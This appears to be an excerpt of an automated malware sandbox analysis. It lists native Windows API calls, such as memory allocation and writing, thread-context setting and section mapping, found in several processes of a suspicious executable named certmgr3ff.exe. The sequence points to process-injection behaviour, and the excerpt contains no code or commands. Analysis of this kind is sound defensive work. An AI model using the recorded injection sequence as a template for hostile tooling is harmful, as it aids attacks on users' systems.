Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022976AD NtAllocateVirtualMemory,	24_2_022976AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229B688 NtProtectVirtualMemory,	24_2_0229B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229BBCC NtSetContextThread,	24_2_0229BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296029 NtWriteVirtualMemory,	24_2_02296029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296829 NtWriteVirtualMemory,	24_2_02296829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296035 NtWriteVirtualMemory,	24_2_02296035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296835 NtWriteVirtualMemory,	24_2_02296835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296805 NtWriteVirtualMemory,	24_2_02296805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229681D NtWriteVirtualMemory,	24_2_0229681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296269 NtWriteVirtualMemory,	24_2_02296269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A69 NtWriteVirtualMemory,	24_2_02296A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229646D NtWriteVirtualMemory,	24_2_0229646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296065 NtWriteVirtualMemory,	24_2_02296065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296479 NtWriteVirtualMemory,	24_2_02296479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296071 NtWriteVirtualMemory,	24_2_02296071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A75 NtWriteVirtualMemory,	24_2_02296A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229684C NtWriteVirtualMemory,	24_2_0229684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296041 NtWriteVirtualMemory,	24_2_02296041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296841 NtWriteVirtualMemory,	24_2_02296841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296059 NtWriteVirtualMemory,	24_2_02296059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229625D NtWriteVirtualMemory,	24_2_0229625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A5D NtWriteVirtualMemory,	24_2_02296A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229A25C NtWriteVirtualMemory,LoadLibraryA,	24_2_0229A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296251 NtWriteVirtualMemory,	24_2_02296251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022958A9 NtWriteVirtualMemory,	24_2_022958A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022964A9 NtWriteVirtualMemory,	24_2_022964A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296AA5 NtWriteVirtualMemory,	24_2_02296AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229628D NtWriteVirtualMemory,	24_2_0229628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A8D NtWriteVirtualMemory,	24_2_02296A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296281 NtWriteVirtualMemory,	24_2_02296281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296485 NtWriteVirtualMemory,	24_2_02296485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A99 NtWriteVirtualMemory,	24_2_02296A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229649D NtWriteVirtualMemory,	24_2_0229649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296491 NtWriteVirtualMemory,	24_2_02296491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296CE1 NtWriteVirtualMemory,	24_2_02296CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EE5 NtWriteVirtualMemory,	24_2_02295EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EFD NtWriteVirtualMemory,	24_2_02295EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ECD NtWriteVirtualMemory,	24_2_02295ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EC3 NtWriteVirtualMemory,	24_2_02295EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ED9 NtWriteVirtualMemory,	24_2_02295ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296929 NtWriteVirtualMemory,	24_2_02296929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229673B NtWriteVirtualMemory,	24_2_0229673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229613D NtWriteVirtualMemory,	24_2_0229613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296935 NtWriteVirtualMemory,	24_2_02296935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F11 NtWriteVirtualMemory,	24_2_02295F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F15 NtWriteVirtualMemory,	24_2_02295F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296769 NtWriteVirtualMemory,	24_2_02296769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229616D NtWriteVirtualMemory,	24_2_0229616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296365 NtWriteVirtualMemory,	24_2_02296365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296179 NtWriteVirtualMemory,	24_2_02296179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229637D NtWriteVirtualMemory,	24_2_0229637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229694D NtWriteVirtualMemory,	24_2_0229694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296941 NtWriteVirtualMemory,	24_2_02296941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296745 NtWriteVirtualMemory,	24_2_02296745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296959 NtWriteVirtualMemory,	24_2_02296959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229635B NtWriteVirtualMemory,	24_2_0229635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229675D NtWriteVirtualMemory,	24_2_0229675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296751 NtWriteVirtualMemory,	24_2_02296751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296155 NtWriteVirtualMemory,	24_2_02296155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965BD NtWriteVirtualMemory,	24_2_022965BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965B1 NtWriteVirtualMemory,	24_2_022965B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296389 NtWriteVirtualMemory,	24_2_02296389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296185 NtWriteVirtualMemory,	24_2_02296185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296395 NtWriteVirtualMemory,	24_2_02296395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965E1 NtWriteVirtualMemory,	24_2_022965E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BF5 NtWriteVirtualMemory,	24_2_02296BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965C9 NtWriteVirtualMemory,	24_2_022965C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BC5 NtWriteVirtualMemory,	24_2_02296BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BDD NtWriteVirtualMemory,	24_2_02296BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BD1 NtWriteVirtualMemory,	24_2_02296BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965D5 NtWriteVirtualMemory,	24_2_022965D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C76AD NtAllocateVirtualMemory,	25_2_022C76AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CB688 NtProtectVirtualMemory,	25_2_022CB688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6029 NtWriteVirtualMemory,	25_2_022C6029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6829 NtWriteVirtualMemory,	25_2_022C6829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6035 NtWriteVirtualMemory,	25_2_022C6035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6835 NtWriteVirtualMemory,	25_2_022C6835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6805 NtWriteVirtualMemory,	25_2_022C6805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C681D NtWriteVirtualMemory,	25_2_022C681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C646D NtWriteVirtualMemory,	25_2_022C646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6269 NtWriteVirtualMemory,	25_2_022C6269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A69 NtWriteVirtualMemory,	25_2_022C6A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6065 NtWriteVirtualMemory,	25_2_022C6065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6479 NtWriteVirtualMemory,	25_2_022C6479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A75 NtWriteVirtualMemory,	25_2_022C6A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6071 NtWriteVirtualMemory,	25_2_022C6071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C684C NtWriteVirtualMemory,	25_2_022C684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6041 NtWriteVirtualMemory,	25_2_022C6041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6841 NtWriteVirtualMemory,	25_2_022C6841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA25C NtWriteVirtualMemory,LoadLibraryA,	25_2_022CA25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C625D NtWriteVirtualMemory,	25_2_022C625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A5D NtWriteVirtualMemory,	25_2_022C6A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6059 NtWriteVirtualMemory,	25_2_022C6059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6251 NtWriteVirtualMemory,	25_2_022C6251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C58A9 NtWriteVirtualMemory,	25_2_022C58A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C64A9 NtWriteVirtualMemory,	25_2_022C64A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6AA5 NtWriteVirtualMemory,	25_2_022C6AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C628D NtWriteVirtualMemory,	25_2_022C628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A8D NtWriteVirtualMemory,	25_2_022C6A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6485 NtWriteVirtualMemory,	25_2_022C6485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6281 NtWriteVirtualMemory,	25_2_022C6281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C649D NtWriteVirtualMemory,	25_2_022C649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A99 NtWriteVirtualMemory,	25_2_022C6A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6491 NtWriteVirtualMemory,	25_2_022C6491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EE5 NtWriteVirtualMemory,	25_2_022C5EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6CE1 NtWriteVirtualMemory,	25_2_022C6CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EFD NtWriteVirtualMemory,	25_2_022C5EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ECD NtWriteVirtualMemory,	25_2_022C5ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EC3 NtWriteVirtualMemory,	25_2_022C5EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ED9 NtWriteVirtualMemory,	25_2_022C5ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6929 NtWriteVirtualMemory,	25_2_022C6929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C613D NtWriteVirtualMemory,	25_2_022C613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C673B NtWriteVirtualMemory,	25_2_022C673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6935 NtWriteVirtualMemory,	25_2_022C6935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F15 NtWriteVirtualMemory,	25_2_022C5F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F11 NtWriteVirtualMemory,	25_2_022C5F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C616D NtWriteVirtualMemory,	25_2_022C616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6769 NtWriteVirtualMemory,	25_2_022C6769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6365 NtWriteVirtualMemory,	25_2_022C6365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C637D NtWriteVirtualMemory,	25_2_022C637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6179 NtWriteVirtualMemory,	25_2_022C6179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C694D NtWriteVirtualMemory,	25_2_022C694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6745 NtWriteVirtualMemory,	25_2_022C6745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6941 NtWriteVirtualMemory,	25_2_022C6941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C675D NtWriteVirtualMemory,	25_2_022C675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6959 NtWriteVirtualMemory,	25_2_022C6959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C635B NtWriteVirtualMemory,	25_2_022C635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6155 NtWriteVirtualMemory,	25_2_022C6155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6751 NtWriteVirtualMemory,	25_2_022C6751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65BD NtWriteVirtualMemory,	25_2_022C65BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65B1 NtWriteVirtualMemory,	25_2_022C65B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6389 NtWriteVirtualMemory,	25_2_022C6389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6185 NtWriteVirtualMemory,	25_2_022C6185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6395 NtWriteVirtualMemory,	25_2_022C6395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65E1 NtWriteVirtualMemory,	25_2_022C65E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BF5 NtWriteVirtualMemory,	25_2_022C6BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65C9 NtWriteVirtualMemory,	25_2_022C65C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BC5 NtWriteVirtualMemory,	25_2_022C6BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BDD NtWriteVirtualMemory,	25_2_022C6BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65D5 NtWriteVirtualMemory,	25_2_022C65D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BD1 NtWriteVirtualMemory,	25_2_022C6BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	26_2_1E9C2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2D10 NtQuerySystemInformation,LdrInitializeThunk,	26_2_1E9C2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B90 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_1E9C2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	26_2_1E9C2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C34E0 NtCreateMutant,LdrInitializeThunk,	26_2_1E9C34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E80 NtCreateProcessEx,	26_2_1E9C2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2EB0 NtProtectVirtualMemory,	26_2_1E9C2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2ED0 NtResumeThread,	26_2_1E9C2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2EC0 NtQuerySection,	26_2_1E9C2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E00 NtQueueApcThread,	26_2_1E9C2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E50 NtCreateSection,	26_2_1E9C2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2FB0 NtSetValueKey,	26_2_1E9C2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2F00 NtCreateFile,	26_2_1E9C2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2F30 NtOpenDirectoryObject,	26_2_1E9C2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C3C90 NtOpenThread,	26_2_1E9C3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2CD0 NtEnumerateKey,	26_2_1E9C2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2CF0 NtDelayExecution,	26_2_1E9C2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C10 NtOpenProcess,	26_2_1E9C2C10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C3C30 NtOpenProcessToken,	26_2_1E9C3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C30 NtMapViewOfSection,	26_2_1E9C2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C20 NtSetInformationFile,	26_2_1E9C2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C50 NtUnmapViewOfSection,	26_2_1E9C2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2DA0 NtReadVirtualMemory,	26_2_1E9C2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2D50 NtWriteVirtualMemory,	26_2_1E9C2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2A80 NtClose,	26_2_1E9C2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2AA0 NtQueryInformationFile,	26_2_1E9C2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2AC0 NtEnumerateValueKey,	26_2_1E9C2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2A10 NtWriteFile,	26_2_1E9C2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B80 NtCreateKey,	26_2_1E9C2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2BC0 NtQueryInformationToken,	26_2_1E9C2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2BE0 NtQueryVirtualMemory,	26_2_1E9C2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B00 NtQueryValueKey,	26_2_1E9C2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B20 NtQueryInformationProcess,	26_2_1E9C2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C38D0 NtGetContextThread,	26_2_1E9C38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C29D0 NtWaitForSingleObject,	26_2_1E9C29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C29F0 NtReadFile,	26_2_1E9C29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C4570 NtSuspendThread,	26_2_1E9C4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C4260 NtSetContextThread,	26_2_1E9C4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_0056244F NtProtectVirtualMemory,	26_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_0056B688 NtProtectVirtualMemory,	26_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_005676AD NtAllocateVirtualMemory,	26_2_005676AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	27_2_1E9D2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2D10 NtQuerySystemInformation,LdrInitializeThunk,	27_2_1E9D2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_1E9D2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	27_2_1E9D2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D34E0 NtCreateMutant,LdrInitializeThunk,	27_2_1E9D34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E80 NtCreateProcessEx,	27_2_1E9D2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2EB0 NtProtectVirtualMemory,	27_2_1E9D2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2ED0 NtResumeThread,	27_2_1E9D2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2EC0 NtQuerySection,	27_2_1E9D2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E00 NtQueueApcThread,	27_2_1E9D2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E50 NtCreateSection,	27_2_1E9D2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2FB0 NtSetValueKey,	27_2_1E9D2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2F00 NtCreateFile,	27_2_1E9D2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2F30 NtOpenDirectoryObject,	27_2_1E9D2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D3C90 NtOpenThread,	27_2_1E9D3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2CD0 NtEnumerateKey,	27_2_1E9D2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2CF0 NtDelayExecution,	27_2_1E9D2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C10 NtOpenProcess,	27_2_1E9D2C10
